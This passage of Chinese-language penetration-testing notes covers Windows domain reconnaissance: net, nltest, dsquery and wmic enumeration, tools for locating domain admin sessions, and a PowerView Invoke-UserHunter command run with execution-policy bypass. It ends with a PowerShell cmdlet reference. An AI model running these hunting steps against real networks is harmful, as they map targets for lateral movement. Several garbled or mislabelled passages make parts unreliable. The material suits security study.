9200,9300	Elasticsearcb服务	远程执行
11211	Memcached服务	未授权访问
512,513,514	Linux rexec服务	爆破,远程登录
873	rsync服务	匿名访问,文件上传
3690	SVN服务	SVN泄漏,未授权访问
50000	SAP Management Console	远程执行

6. 域内基础信息收集

查询权限

查看当前权限命令如下

whoami

获取一台主机的权限后,有三种情况

1. 本地普通用户:当前为本机的user用户

   

2. 本地管理员用户:当前为本机的administrator

   

3. 域内用户:当前为域内普通用户

   

4. 域内用户:当前为hack域内普通用户

   

在这四种情况中

• 如果当前内网中存在于,那么本地普通用户只能查询本机相关信息,不能查询域内信息
• 而本地管理员公户和域内用户可以查询域内信息

其原理是:域内的所有查询都是通过域控制器实现的(基于LDAP协议),而这个查询需要经过权限认证,所以只有与用户才有这个权限,当与用户执行查询命令时,会自动使用Kerberos协议进行认证,无序额外输入账号和密码

本地管理员Administrator权限可以直接提升为Ntauthority或者System权限,因此,在域中,除普通用户外,所有的机器都有一个机器用户(用户名是机器名加上”$”),在本质上,机器的system用户对应的就是域内机器用户,所以使用system权限可以运行域内的查询命令

判断域的存在

获得了本机的相关信息后,就要判断当前内网中是否存在域,如果当前内网中存在域,就需要判断所控主机是否在域内.

1. Ipconfig /all命令

• 执行命令,可以查看网关IP,DNS的IP地址,域名,本机是否和DNS服务器处于同一网段等信息

  

• 然后通过反向解析查询域名nslookup来解析域名的IP地址,用解析得到的IP地址进行对比判断域控制器和DNS服务器是否在同一台服务器上

  

2. SystemInfo

• 执行如下命令,域即域名,登录服务器为域控制器如果域为WORKGROUP,表示当前服务器不再域内

  

3. net config workstation

3. Net time /domain

一般会有如下三种情况

1. 存在域,但当前用户不是域用户

   

2. 存在域,并且当前用户时域用户

   

3. 当前网络环境为工作组,不存在域

   

4. 确定了当前内网拥有的域,且所控制的主机在域内,就可以进行域内相关信息的收集了。介绍的查询命令在本质上都 是通过LDAP协议到域控制器上进行查询的,所以在查询 时需要进行权限认证。只有域用户才拥有此权限,本地用户无法运行本节介绍的查询命令( System 权限用户除外。在域中,除普通用户外,所有的机器都有一个机器用户,其用户名为机器名加上 “$”。 System权限用户对应的就是域里面的机器用户,所以System权限用户可以运行本节介绍 的查询命令)

net命令详解

net命令是一个命令行命令,net命令有很多函数用户实用和核查激素七年级之间的NetBIOS连接,可以查看我们的管理网络环境,服务,用户,登录等信息内容

主要命令
NET View	NET User	NET Use	NET Time	Net Start
Net Pause	Net Continue	NET Stop	Net Statistics	Net Share
Net Session	Net Send	Net Print	Net Name	Net Localgroup
Net Group	Net File	Net Config	Net Computer	Net Accounts

1. net view

作用：显示域列表、计算机列表或指定计算机的共享资源列表。
命令格式：Net view [\\computername | /domain[:domainname]]
有关参数说明：
键入不带参数的net  view显示当前域的计算机列表
\\computername  指定要查看其共享资源的计算机
/domain[:domainname]指定要查看其可用计算机的域例如：Net view \\GHQ查看GHQ计算机的共享资源列表。
Net view /domain:XYZ 查看XYZ域中的机器列表。

2. net user

作用：添加或更改用户帐号或显示用户帐号信息。
命令格式：`Net user [username [password | *] [options]] [/domain]`
有关参数说明：
	‐键入不带参数的Net user查看计算机上的用户帐号列表
	‐username添加、删除、更改或查看用户帐号名
	‐password为用户帐号分配或更改密码
	‐提示输入密码
	‐`/domain`在计算机主域的主域控制器中执行操作。该参数仅在Windows NT Server 域成员的 Windows NT Workstation 计算机上可用。默认情况下，Windows NT Server 计算机在主域控制器中执行操作。注意：在计算机主域的主域控制器发生该动作。它可能不是登录域。例如：`Net user ghq123`查看用户GHQ123的信息。

3. net use

**作用:**连接计算机或断开计算机与共享资源的连接,或显示计算机的连接信息

命令格式：`Net use [devicename | *] [\\computername\sharename[\volume]] no}]]` password|*] [[/delete]| [/persistent:{yes |
有关参数说明：
	‐键入不带参数的Net use列出网络连接
	‐devicename指定要连接到的资源名称或要断开的设备名称
	‐`\\computername\sharename`服务器及共享资源的名称
	‐password访问共享资源的密码
	‐*提示键入密码
	‐`/user`指定进行连接的另外一个用户
	‐`domainname`指定另一个域
	‐`username`指定登录的用户名
	‐`/home`将用户连接到其宿主目录
	‐`/delete`取消指定网络连接
	‐`/persistent`控制永久网络连接的使用。
	例如：`Net use f: \\GHQ\TEMP` 将\GHQ\TEMP目录建立为F盘
		 `Net use f: \GHQ\TEMP` /delete 断开连接。

4. net time

作用:使计算机的时钟与另一台计算机或域的时间同步

命令格式：`Net time [\\computername | /domain[:name]] [/set]`
有关参数说明：
	‐`\\computername`要检查或同步的服务器名
	‐`/domain[:name]`指定要与其时间同步的域
	‐`/set`使本计算机时钟与指定计算机或域的时钟同步。

5. net start

**作用:**启动服务,或显示已启动服务的列表

命令格式：`Net start service`

6. net pause

**作用:**暂停正在运行的服务

命令格式：`Net pause service`

7. Net Continue

**作用:**重新激活挂起的服务。

命令格式：`Net continue service`

8. net stop

**作用:**停止Windows NT/2000/2003网络服务

命令格式：`Net stop service`

9. net statistics

**作用:**显示本地工作站或服务器服务的统计记录

命令格式：`Net statistics [workstation | server]`
有关参数说明：
∙键入不带参数的Net statistics列出其统计信息可用的运行服务
∙`workstation`显示本地工作站服务的统计信息
∙`server`显示本地服务器服务的统计信息
例如：Net statistics server | more显示服务器服务的统计信息。

10. net share

**作用:**创建,删除或显示共享资源

命令格式：`Net share sharename=drive:path [/users:number | /unlimited] [/remark:"text"]`
有关参数说明：
	∙键入不带参数的Net share显示本地计算机上所有共享资源的信息
	∙`sharename`是共享资源的网络名称
	∙`drive:path`指定共享目录的绝对路径
	∙`/users:number`设置可同时访问共享资源的最大用户数
	∙`/unlimited`不限制同时访问共享资源的用户数
	∙`/remark:"text "`添加关于资源的注释，注释文字用引号引住
例如： `Net share yesky=c:\temp /remark:"my first share"`
以yesky为共享名共享C:\temp
`Net share yesky /delete`停止共享yesky目录

11. net session

**作用:**列出或断开本地计算机和与之连接的客户端的会话

命令格式：`Net session [\\computername] [/delete]`
有关参数说明：
	∙键入不带参数的Net session显示所有与本地计算机的会话的信息。
	∙`\\computername`标识要列出或断开会话的计算机。
	∙`/delete`结束与 `\computername` 计算机会话并关闭本次会话期间计算机的所有打开文件。如果省略`\computername` 参数，将取消与本地计算机的所有会话。
例如：`Net session [url=file://\\GHQ]\\GHQ[/url]`要显示计算机名为GHQ的客户端会话信息列表。

12. net send

**作用:**向网络的其他用户,计算机或通信名发送消息

命令格式：`Net send {name | * | /domain[:name] | /users} message`
有关参数说明：
	∙`name`要接收发送消息的用户名、计算机名或通信名
	∙* 将消息发送到组中所有名称
	∙`/domain[:name]`将消息发送到计算机域中的所有名称
	∙`/users`将消息发送到与服务器连接的所有用户
	∙`message`作为消息发送的文本
例如：`Net send /users server will shutdown in 10 minutes`.给所有连接到服务器的用户发送消息。

13. net print

**作用:**显示或控制打印作业及打印队列

命令格式：`Net print [\\computername ] job# [/hold | /release | /delete]`
有关参数说明： 
∙`computername`共享打印机队列的计算机名 
∙`sharename`打印队列名称 
∙`job#`在打印机队列中分配给打印作业的标识号 
∙`/hold`使用`job#`时，在打印机队列中使打印作业等待 
∙`/release`释放保留的打印作业 
∙`/delete`从打印机队列中删除打印作业 
例如：`Net print \\GHQ\HP8000列出[url=file://\\GHQ]\\GHQ[/url]`计算机上HP8000打印机队列的目录。

14. net name

**作用:**添加或删除消息名(有时也称别名),或显示计算机接收消息的名称列表

命令格式：`Net name [name [/add | /delete]]` 
有关参数说明： 
	∙键入不带参数的Net name列出当前使用的名称 
	∙`name`指定接收消息的名称 
	∙`/add`将名称添加到计算机中 
	∙`/delete`从计算机中删除名称

15. net localgroup

**作用:**添加,显示或更改本地组

`Net localgroup groupname {/add [/comment:"text "] | /delete} [/domain]`     有关参数说明： 
    ∙键入不带参数的`Net localgroup`显示服务器名称和计算机的本地组名称 
    ∙`groupname`要添加、扩充或删除的本地组名称 
    ∙`/comment: "text "`为新建或现有组添加注释 
    ∙`/domain`在当前域的主域控制器中执行操作，否则仅在本地计算机上执行操作 
    ∙`name [ ...]`列出要添加到本地组或从本地组中删除的一个或多个用户名或组名 
    ∙`/add`将全局组名或用户名添加到本地组中 
    ∙`/delete`从本地组中删除组名或用户名 
    例如：`Net localgroup ggg /add` 将名为ggg的本地组添加到本地用户帐号数据库； 
    `Net localgroup ggg` 显示ggg本地组中的用户。 

16. net group

**作用:**在Windows NT/2000/2003 Server域中添加,显示或更改全局组

命令格式：`Net group groupname {/add [/comment:"text "] | /delete} [/domain]` 
    有关参数说明： 
    ∙键入不带参数的Net group显示服务器名称及服务器的组名称 
    ∙`groupname`要添加、扩展或删除的组 
    ∙`/comment:"text "`为新建组或现有组添加注释 
    ∙`/domain`在当前域的主域控制器中执行该操作，否则在本地计算机上执行操作 
    ∙`username[ ...]`列表显示要添加到组或从组中删除的一个或多个用户 
    ∙`/add`添加组或在组中添加用户名 
    ∙`/delete`删除组或从组中删除用户名 
    例如：`Net group ggg GHQ1 GHQ2 /add`将现有用户帐号GHQ1和GHQ2添加到本地计算机的ggg组。 

17. net file

**作用:**显示某服务器上所有打开的共享文件名及锁定文件数

命令格式：`Net file [id [/close]]` 
    有关参数说明： 
    ∙键入不带参数的Net file获得服务器上打开文件的列表     ∙`id`文件标识号 
    ∙/close关闭打开的文件并释放锁定记录 

18. net config

作用：显示当前运行的可配置服务，或显示并更改某项服务的设置。

命令格式：Net computer \computername {/add | /del} 有关参数说明： 
       ∙\\computername指定要添加到域或从域中删除的计算机 
       ∙/add将指定计算机添加到域 
       ∙/del将指定计算机从域中删除 
       例如：Net computer \\js /add将计算机js 添加到登录域。 

查询域

net view /domain

查询域内所有计算机

执行如下命令,就可以通过查询得到的主机名对主机角色进行初步判断,如图。例如,”dev”可能是开发服务器,”web””app”可能是Web服务器,”NAS”可能是存储服务器” fifileserver”可能是文件服务器等。

net view/domain:域名

查询域内所有用户组列表

net group /domain

执行如下命令,查询域内所有用户组列表。

系统自带的常见用户身份如下：

DomainAdmins:域管理员。 
DomainComputers:域内机器。 
DomainControllers:域控制器。 
DomainGusers:域访客,权限较低。 
DomainUser:域用户。 
EnterpriseAdmins:企业系统管理员用户 
在默认情况下, Domain admins和Enterprise Admins对域内所有域控制器有完全控制权限 

查询所有域成员计算机列表

执行如下命令，查询所有域成员计算机列表

net group "domain computers" /domain

获取域密码信息

执行如下命令获取域密码策略、密码长度、错误锁定等信息

net accounts /domain 

获取域信任信息

执行如下命令获取域信任信息

nltest /domain_trusts

7.查找域控制器

查看域控制器的机器名

执行如下命令,可以看到,域控制器的机器名

nltest /DCLIST:hack

查看域控制器的主机名

执行如下命令,可以看到,域控制器的主机名

nslookup ‐type=SRV _ldap._tcp

查看当前时间

在通常情况下,时间服务器为主域控制器。执行如下命令

net time /domain

查看域控制器组

执行如下命令,查看域控制器组。其中有一台机器名为”DC”的域控制器

net group "Domain Controllers" /domain

在实际网络中,一个域内一般存在两台或两台以上的域控制器,其目的是:一旦主域控制器发生故障,备用的域控制器可 以保证域内的服务和验证工作正常进行。

8. 获取域内用户

向域控制器进行查询

执行如下命令,向域控制器DC进行查询,,域内有多个用户。其中,krbtgt 用户不仅可以创建票据授权服务(TGS)的加密密钥,还可以实现多种域内权限持久化方法

net user /domain

获取域内用户的详细信息

执行如下命令，可以获取域内用户的详细常见参数包括用户名，描述信息，SID，域名，状态等。

wmic命令详解

命令	功能
alias	对本地系统上可用别名的访问
baseboard	基板（也称为主板或系统版）管理
bootconfig	启动配置管理
cdrom	CD-ROM管理
computersystem	计算机系统管理
cpu	CPU管理
csproduct	SMBIOS中的计算机系统产品信息
datafile	数据文件管理
dcomapp	DCOM应用程序管理
desktop	用户的桌面管理
desktopmonitor	桌面监视器管理
devicememoryaddress	设备内存地址管理
diskdrive	物理磁盘驱动器管理
diskquota	用于NTFS卷的磁盘空间使用量
dmachannel	直接内存访问（DMA）通道管理
environment	系统环境设置管理
fsdir	文件系统目录项管理
group	组账户管理
idecontroller	IDE控制器管理
irq	中断请求线路（IRQ）管理
job	提供对使用计划服务安排的作业的访问
loaddrder	定义执行依赖关系的系统服务的管理
logicaldisk	本地存储设备管理
logon	登录会话
memcache	缓存内存管理
memorychip	内存芯片信息
memphysical	计算机系统的物理内存管理
netclient	网络客户端管理
netlogin	网络登录信息（属于特定用户）管理
netprotocol	协议（及其网络特征）管理
netuse	活动网络连接管理
nic	网络接口控制器
nicconfig	网络适配器管理
ntdomain	NT域管理
ntevent	NT事件日志中的项目
nteventlog	NT事件日志文件管理
onboarddevice	主板（系统板）中内置的通用适配器设备的管理
os	已安装操作系统的管理
pagefile	虚拟内存文件交换管理
pagefileset	页面文件设置管理
partition	物理磁盘的已分区区域的管理
port	I/O端口管理
portconnector	物理连接端口管理
printer	打印机设备管理
printerconfig	打印机设备配置管理
printjob	打印作业管理
process	进程管理
product	安装程序包任务管理
qfe	安装修复工程
quotasetting	卷上的磁盘配额设置信息
rdaccount	远程桌面连接权限管理
rdnic	对特定网络适配器的远程桌面连接管理
rdpermissions	特定远程桌面连接的权限
rdtoggle	远程打开或关闭远程桌面侦听程序
recoveros	操作系统出现故障时将从内存收集的信息
registry	计算机系统注册表管理
scsicontroller	scsi控制器管理
server	服务器信息管理
service	服务应用程序管理
shadowcopy	卷影副本管理
shadowstorage	卷影副本存储区域管理
share	共享资源管理
softwareelement	系统上安装的软件产品元素的管理
softwarefeature	SoftwareElement的软件产品子集的管理
sounddev	声音设备管理
startup	当用户登录到计算机系统时自动运行的命令的管理
sysaccount	系统账户管理
sysdriver	基本服务的系统驱动程序管理
systemenclosure	物理系统外壳管理
systemslot	物理连接点（包括端口，插槽和外设以及专用连接点）的管理
tapedrive	磁带驱动器管理
temperature	温度传感器(电子温度计)数据管理
timezone	时区数据管理
ups	不间断电源（UPS）管理
useraccount	用户账户管理
voltage	电压传感器（电子电压表）数据管理
volume	本地存储卷管理
volumequotasetting	将磁盘配额设置与特定磁盘卷相关联
volumeuserquota	每用户存储卷配额管理
wmiset	wmi服务操作参数管理

wmic useraccount get/all

查看存在的用户

执行如下命令，可以看到域内用户（server机器有这条命令）

dsquery user

常用的dsquery命令：

命令	功能
dsquery computer	查找目录中的计算机
dsquery contact	查找目录中的联系人
dsquery subnet	查找目录中的子网
dsquery group	查找目录中的组
dsquery ou	查找目录中的组织单位
dsquery site	查找目录中的站点
dsquery server	查找目录中的ADDC/LDs实例
asquery user	查找目录中的用户
dsquery quota	查找目录中的配额规定
dsquery partition	查找目录中的分区

查找本地管理员组用户

net localgroup administrators

Domain admin组中的用户默认为域内机器的本地管理员用户 在实际应用中为了方便管理会有域用户被设置为域机器的本地管理员用户。

查询域管理用户

net group "domain admins" /domain

查询域管理员用户组

net group "Enterprise Admins" /domain

9.定位域管理员

1. 在内网中，通常会部署大址的网络安全系统和设备,例如IDS、IPS、日志审计、安全网关、 反病毒软件等。在域网络攻击测试中,获取域内的一个支点后，需要获取域管理员权限. 在一个域中，当计算机加入域后，会默认给域管理员组赋予本地系统管理员权限,也就是说, 当目机被添加到城中.成为域的成员主机后，系统会自动将域管理员组添加到本地系统管理员组中，因此域管理员组的成员都可以访问本地计算机，且具备安全控制权限
2. 定位域内管理员的常规果道，一是日志，二是会话。日志是指本地机器的管理员日志，会话是指域内每台机器的登 录会话
3. 假设已经在Windows域中取得了普通用户权限，希望在城内横向移动，需 要知道域内用户登录的位置、他是否是任何系统的本地管理员、他所属的组、他是否有权访问文 件共享等。枚举主机、用户和组，有助于更好地了解域的布局。

手动定位域管理员

命令	功能
net view /domain	查看当前域名
net view /domain:域名	查看域内部所有计算机名
net group /domain	查看域内部所有用户组列表
net group “domain computers” /domain	查看所有域成员计算机列表
net accounts /domain	查看域密码信息
nltest /domain_trusts	获取域信任信息
nltest /DCLIST:域名	查看域控制器机器名
net time /domain	查看当前时间，因为时间服务器也是主域服务器，可以看到域服务器的机器名
net group “Domain Controllers” /domain	查看域控制器组，因为可能有不止一台域控，有主备之分
net user /domain	查看域内用户，会看到熟悉的krbtgt用户
wmic useraccount get /all	获取域内用户详细信息
dsquery user	查看域内存在的用户
net localgroup administrator	查看本地管理员用户组
net group “domain admins” /domain	查询域管理员用户

psloggedom.exe工具

psloggedon.exe 可以显示本地登录的用户和通过本地计算机或远程计算机的资源登录的用户。如果指定了用户名而不是计算机，psloggedon.exe会搜索网络邻居中的计算机，并显示该用户当前是否已登录。

psloggedon.exe [‐] [‐l] [‐x] [\\computername或username]

PVEDFindADUser.exe工具

pveFindADUser.exe可用于查找 Active Directory 用户登录的位置，枚举域用户，以及查找在 特定计算机上登录的用户，包括本地用户、通过RDP 登录的用户、用于运行服务和计划任务的用户账 户。运行该工具的计算机需要具有.NETFramework 2.0，并且需要具有管理员权限

‐h：显示帮助信息

‐current[“username”]：如果仅指定‐current参数，将获取目标计算机上当前登录的所有用户。如果指定了用户名

（Domain\Username），则显示该用户登录的计算机

‐last[“username”]：如果仅指定‐last参数，将获取目标计算机上最后一个登录用户。如果指定了用户名

（Domain\Username），则显示此用户上次登录的计算机。根据网络的安全策略，可能会隐藏最后一个登录用户的用户 名，此时使用该工具可能无法得到用户名

‐noping：阻止该工具在获取用户登陆信息之前对目标执行ping命令

‐target：可选参数，用于指定要查询的主机。如果未指定该参数，将查询域中的所有主机。如果指定了此参数，主机名列表由逗号分隔

直接运行”pvefindaduser.exe ‐current”，即可显示域中所有计算机上当前登录的用户

netview.exe

netview.exe是一个枚举工具，使用WinAPI枚举系统，利用NetSessionEnum找寻登录会话，利用NetShareEnum找寻共享，利用NetWkstaUserEnum枚举登录的用户。同时，netview.exe能够查询共享入口和有价值的用户。netview.exe的绝大部分功能不需要管理员权限就可以使用。

使用语法：netview.exe	功能
-h	显示帮助菜单
-f filename.txt	指定从中提取主机列表的文件
-e filename.txt	指定要排除的主机名文件
-o filename.txt	将所有输出重定向到文件
-d domain	指定从中提取主机列表的域，如果没有指定，则使用当前域
-g group	指定用户搜寻的组名，如果没有指定，则使用Domain Admins
-c	检查对已找到共享的访问权限

NSE脚本

如果存在域账户或者本地账户就可以使用Nmap的smb-enum-sessions.nse引擎获取远程机器的登录会话（不需要管理员权限）。

命令	功能
smb-enum-domain	对域控制器进行信息收集，可以获取主机的信息，用户，可以使用密码策略的用户等
smb-enum-users	在进行域渗透测试时，如果获得了域内某台主机的权限，无法获取更多的与用户信息，就可以借助这个脚本对域控制器进行扫描
smb-enum-shares	遍历远程主机的共享目录
smb-enmu-processes	对主机的系统进行遍历，通过这些信息，可以知道目标主机上正在运行哪些软件
smb-enum-sessions	获取域内主机的用户登录会话，查看当前是否有用户登录
smb-os-discovery	收集目标主机的操作系统，计算机名，域名域林名称，NetBIOS机器名，NetBIOS域名，工作组

PowerView脚本

PowerView 脚本中包含了一系列的 powershell 脚本，信息收集相关的脚本有 Invoke-StealthUserHunter、Invoke-UserHunter 等，

powershell.exe ‐exec bypass ‐command "& { import‐module .\PowerView.ps1;Invoke‐UserHunter}"

10. PowerShell使用方式

Powershell 是运行在windows机器上实现系统和应用程序管理自动化的命令行脚本环境。你可以把 它看成是命令行提示符cmd.exe的扩充，不对，应当是颠覆。 powershell需要.NET环境的支持，同 时支持.NET对象。微软之所以将Powershell 定位为Power，并不是夸大其词，因为它完全支持对象。其可读性，易用性，可以位居当前所有shell之首。 当前powershell有四版本，分别为1.0， 2.0，3.0 ,4.0

如果您的系统是window7或者Windows Server 2008，那么PowerShell 2.0已经内置了，可以升级 为3.0，4.0。如果您的系统是Windows 8 或者Windows server 2012，那么PowerShell 3.0已经内 置了，可以升级为4.0。如果您的系统为Windows 8.1或者Windows server 2012 R2，那默认已经 是4.0了。

powershell 控制台

右击标题栏选择”属性”弹出powershell控制台对话框。在这里有四个选项卡：选项、字体、布局 和颜色。

1. 【选项】设置光标，历史记录，编辑模式的切换

   

2. 【字体】设置字体的名称和大小

   

3. 【布局】设置窗口的缓冲区、窗口的大小、窗口起始坐标

   

4. 【颜色】设置屏幕和对话框的背景色和前景色。

   

快捷键

按键	功能
ALT+F7	清除命令的历史记录
PgUp PgDn	显示当前会话的第一个命令和最后一个命令
Enter	执行当前命令
End	将光标移至当前命令的末尾
Del	从又开始删除输入的命令字符
Esc	清空当前命令行
F2	自动补充历史命令至指定字
F4	删除命令行至光标右边指定字符处
F7	对话框显示命令行历史命令
F8	检索包含指定字符的命令行历史记录
F9	根据命令行的历史记录编号选择命令，历史记录编号可以通过F7查看
左/右方向键	左右移动光标
上/下方向键	切换命令行的历史记录
Home	光标移至命令行最左端
Backspace	从右删除命令行字符
Ctrl+C	取消正在执行的命令
Ctrl+左/右方向键	在单词之间移动光标
Ctrl+Home	删除光标最左端的所有字符
Tab	自动补全命令或者文件名

管道和重定向

例如通过ls获取当前目录的所有文件信息，然后通过Sort -Descending对文件信息按照Name降序排 列，最后将排序好的文件的Name和Mode格式化成Table输出。

把命令的输出保存到文件中，‘>’为覆盖，’>>’追加

执行外部命令

Powershell能够像CMD一样很好的执行外部命令

Cmd.exe 通过 /c 来接收命令参数，在Cmd中help可以查看可用的命令，所以可以通过Cmd /c help 查找可用的Cmd控制台命令

执行内部命令

每个命令有一个动词和名次组成，命令的作用一目了然

命令	功能	详情链接
Add-Computer	将本地计算机添加到域或工作组	Add-Computer (forsenergy.com)
Add-Content	cmdlet将内容附加到指定的项目或文件	Add-Content (forsenergy.com)
Add-History	向会话历史记录追加条目	Add-History (forsenergy.com)
Add-Member	向 Windows PowerShell 对象的实例中添加用户定义的自定义成员	Add-Member (forsenergy.com)
Add-PSSnapin	将一个或多个 Windows PowerShell 管理单元添加到当前会话。	Add-PSSnapin (forsenergy.com)
Add-Type	向 Windows PowerShell 会话中添加 Microsoft .NET Framework 类型（一种类）	Add-Type (forsenergy.com)
Checkpoint-Compute	在本地计算机上创建系统还原点	Checkpoint-Computer (forsenergy.com)
Clear-Content	删除项的内容（例如从文件中删除文本），但不删除该项	Clear-Content (forsenergy.com)
Clear-EventLog	删除本地或远程计算机上的指定事件日志中的所有条目	Clear-EventLog (forsenergy.com)
Clear-History	删除命令历史记录中的条目	Clear-History (forsenergy.com)
Clear-Item	删除项的内容，但不删除该项	Clear-Item (forsenergy.com)
Clear-ItemProperty	删除属性的值，但不删除该属性	Clear-ItemProperty (forsenergy.com)
Clear-Variable	删除变量的值	Clear-Variable (forsenergy.com)
Compare-Object	比较两组对象	Compare-Object (forsenergy.com)
Complete-Transaction	提交活动事务	Complete-Transaction (forsenergy.com)
Connect-WSMan	连接到远程计算机上的 WinRM 服务	Connect-WSMan (forsenergy.com)
ConvertFrom-Csv	将逗号分隔值 (CSV) 格式的对象属性转换为原始对象的 CSV 版本	ConvertFrom-CSV (forsenergy.com)
ConvertFrom-SecureString	将安全字符串转换为加密的标准字符串	ConvertFrom-SecureString (forsenergy.com)
ConvertFrom-StringData	将包含一个或多个键-值对的字符串转换为哈希表	ConvertFrom-StringData (forsenergy.com)
Convert-Path	将路径从 Windows PowerShell 路径转换为 Windows PowerShell 提供程序路径	Convert-Path (forsenergy.com)
ConvertTo-CSV	将 Microsoft .NET Framework 对象转换为一系列以逗号分隔的 (CSV)、长度可变的字符串	ConvertTo-CSV (forsenergy.com)
ConvertTo-Html	将 Microsoft .NET Framework 对象转换为可在 Web 浏览器中显示的 HTML	ConvertTo-Html (forsenergy.com)
ConvertTo-SecureString	将加密的标准字符串转换为安全字符串。它还可以将纯文本转换为安全字符串	ConvertTo-SecureString (forsenergy.com)
ConvertTo-Xml	创建对象的基于 XML 的表示形式	ConvertTo-XML (forsenergy.com)
Copy-Item	将项从一个位置复制到命名空间内的另一个位置	Copy-Item (forsenergy.com)
Copy-ItemProperty	将属性和值从指定的位置复制到另一个位置	Copy-ItemProperty (forsenergy.com)
Debug-Process	调试在本地计算机上运行的一个或多个进程	Debug-Process (forsenergy.com)
Disable-ComputerRestore	在指定的文件系统驱动器上禁用系统还原功能	Disable-ComputerRestore (forsenergy.com)
Disable-PSBreakpoint	禁用当前控制台中的断点	Disable-PSBreakpoint (forsenergy.com)
Disable-PSRemoting	阻止计算机接收远程 Windows PowerShell 命令	Disable-PSRemoting (forsenergy.com)
Disable-PSSessionConfiguration	拒绝访问本地计算机上的会话配置	Disable-PSSessionConfiguration (forsenergy.com)
Disable-WSManCredSSP	在客户端计算机上禁用凭据安全服务提供程序 (CredSSP) 身份验证	Disable-WSManCredSSP (forsenergy.com)
Disconnect-WSMan	断开客户端与远程计算机上的 WinRM 服务的连接	Disconnect-WSMan (forsenergy.com)
Enable-ComputerRestore	在指定的文件系统驱动器上启用系统还原功能	Enable-ComputerRestore (forsenergy.com)
Enable-PSBreakpoint	启用当前控制台中的断点	Enable-PSBreakpoint (forsenergy.com)
Enable-PSRemoting	将计算机配置为接收远程命令	Enable-PSRemoting (forsenergy.com)
Enable-PSSessionConfiguration	启用本地计算机上的会话配置	Enable-PSSessionConfiguration (forsenergy.com)
Enable-WSManCredSSP	在客户端计算机上启用凭据安全服务提供程序 (CredSSP) 身份验证	Enable-WSManCredSSP (forsenergy.com)
Enter-PSSession	启动与远程计算机间的交互式会话	Enter-PSSession (forsenergy.com)
Exit-PSSession	结束与远程计算机的交互式会话	Exit-PSSession (forsenergy.com)
Export-Alias	将当前定义的别名相关信息导出到文件中	Export-Alias (forsenergy.com)
Export-Clixml	创建对象的基于 XML 的表示形式并将其存储在文件中	Export-Clixml (forsenergy.com)
Export-Console	将当前会话中管理单元的名称导出到一个控制台文件	Export-Console (forsenergy.com)
Export-Counter	Export-Counter cmdlet 获取 PerformanceCounterSampleSet 对象并将它们导出为计数器日志文件	Export-Counter (forsenergy.com)
Export-CSV	将 Microsoft .NET Framework 对象转换为一系列以逗号分隔的、长度可变的 (CSV) 字符串，并将这些字符串保存到一个 CSV 文件中	Export-CSV (forsenergy.com)
Export-FormatData	将当前会话中的格式数据保存在一个格式文件中	Export-FormatData (forsenergy.com)
Export-ModuleMember	指定要导出的模块成员	Export-ModuleMember (forsenergy.com)
Export-PSSession	导入来自其他会话的命令，并将它们保存到 Windows PowerShell 模块中	Export-PSSession (forsenergy.com)
ForEach-Object	针对每一组输入对象执行操作	ForEach-Object (forsenergy.com)
Format-Custom	使用自定义视图来设置输出的格式	Format-Custom (forsenergy.com)
Format-List	将输出的格式设置为属性列表，其中每个属性均各占一行显示	Format-List (forsenergy.com)
Format-Table	将输出的格式设置为表	Format-Table (forsenergy.com)
Format-Wide	将对象的格式设置为只能显示每个对象的一个属性的宽表	Format-Wide (forsenergy.com)
Get-Acl	获取资源（例如文件或注册表项）的安全描述符	Get-Acl (forsenergy.com)
Get-Alias	获取当前会话的别名	Get-Alias (forsenergy.com)
Get-AuthenticodeSignature	获取文件中有关 Authenticode 签名的信息	Get-AuthenticodeSignature (forsenergy.com)
Get-ChildItem	获取一个或多个指定位置中的项和子项	Get-ChildItem (forsenergy.com)
Get-Command	获取有关 cmdlet 以及有关 Windows PowerShell 命令的其他元素的基本信息	Get-Command (forsenergy.com)
Get-ComputerRestorePoint	获取本地计算机上的还原点	Get-ComputerRestorePoint (forsenergy.com)
Get-Content	获取位于指定位置的项的内容	Get-Content (forsenergy.com)
Get-Counter	从本地和远程计算机上获取性能计数器数据	Get-Counter (forsenergy.com)
Get-Credential	获取基于用户名和密码的凭据对象	Get-Credential (forsenergy.com)
Get-Culture	获取操作系统中设置的当前区域性	Get-Culture (forsenergy.com)
Get-Date	获取当前日期和时间	Get-Date (forsenergy.com)
Get-Event	获取事件队列中的事件	Get-Event (forsenergy.com)
Get-EventLog	获取本地或远程计算机上的事件日志或事件日志列表中的事件	Get-EventLog (forsenergy.com)
Get-EventSubscriber	获取当前会话中的事件订阅者	Get-EventSubscriber (forsenergy.com)
Get-ExecutionPolicy	获取当前会话中的执行策略	Get-ExecutionPolicy (forsenergy.com)
Get-FormatData	获取当前会话中的格式数据	Get-FormatData (forsenergy.com)
Get-Help	显示有关 Windows PowerShell 命令和概念的信息	Get-Help (forsenergy.com)
Get-History	获取在当前会话中输入的命令的列表	Get-History (forsenergy.com)
Get-Host	获取表示当前主机程序的对象。默认情况下，还显示 Windows PowerShell 的版本和区域信息	Get-Host (forsenergy.com)
Get-HotFix	获取已应用于本地和远程计算机的修补程序	Get-HotFix (forsenergy.com)
Get-Item	获取位于指定位置的项	Get-Item (forsenergy.com)
Get-ItemProperty	获取指定项的属性	Get-ItemProperty (forsenergy.com)
Get-Job	获取在当前会话中运行的 Windows PowerShell 后台作业	Get-Job (forsenergy.com)
Get-Location	获取当前工作位置的相关信息	Get-Location (forsenergy.com)
Get-Member	获取对象的属性和方法	Get-Member (forsenergy.com)
Get-Module	获取已导入或可以导入到当前会话中的模块	Get-Module (forsenergy.com)
Get-PfxCertificate	获取计算机上 .pfx 证书文件的相关信息	Get-PfxCertificate (forsenergy.com)
Get-Process	获取在本地计算机或远程计算机上运行的进程	Get-Process (forsenergy.com)
Get-PSBreakpoint	获取当前会话中设置的断点	Get-PSBreakpoint (forsenergy.com)
Get-PSCallStack	显示当前调用堆栈	Get-PSCallStack (forsenergy.com)
Get-PSDrive	获取当前会话中的 Windows PowerShell 驱动器	Get-PSDrive (forsenergy.com)
Get-PSProvider	获取有关指定的 Windows PowerShell 提供程序的信息	Get-PSProvider (forsenergy.com)
Get-PSSession	获取当前会话中的 Windows PowerShell 会话 (PSSession)	Get-PSSession (forsenergy.com)
Get-PSSessionConfiguration	获取计算机上已注册的会话配置	Get-PSSessionConfiguration (forsenergy.com)
Get-PSSnapin	获取计算机上的 Windows PowerShell 管理单元	Get-PSSnapin (forsenergy.com)
Get-Random	从集合中获取随机数或随机选择对象	Get-Random (forsenergy.com)
Get-Service	获取本地或远程计算机上的服务	Get-Service (forsenergy.com)
Get-TraceSource	获取用于跟踪的 Windows PowerShell 组件	Get-TraceSource (forsenergy.com)
Get-Transaction	获取当前（活动）事务	Get-Transaction (forsenergy.com)
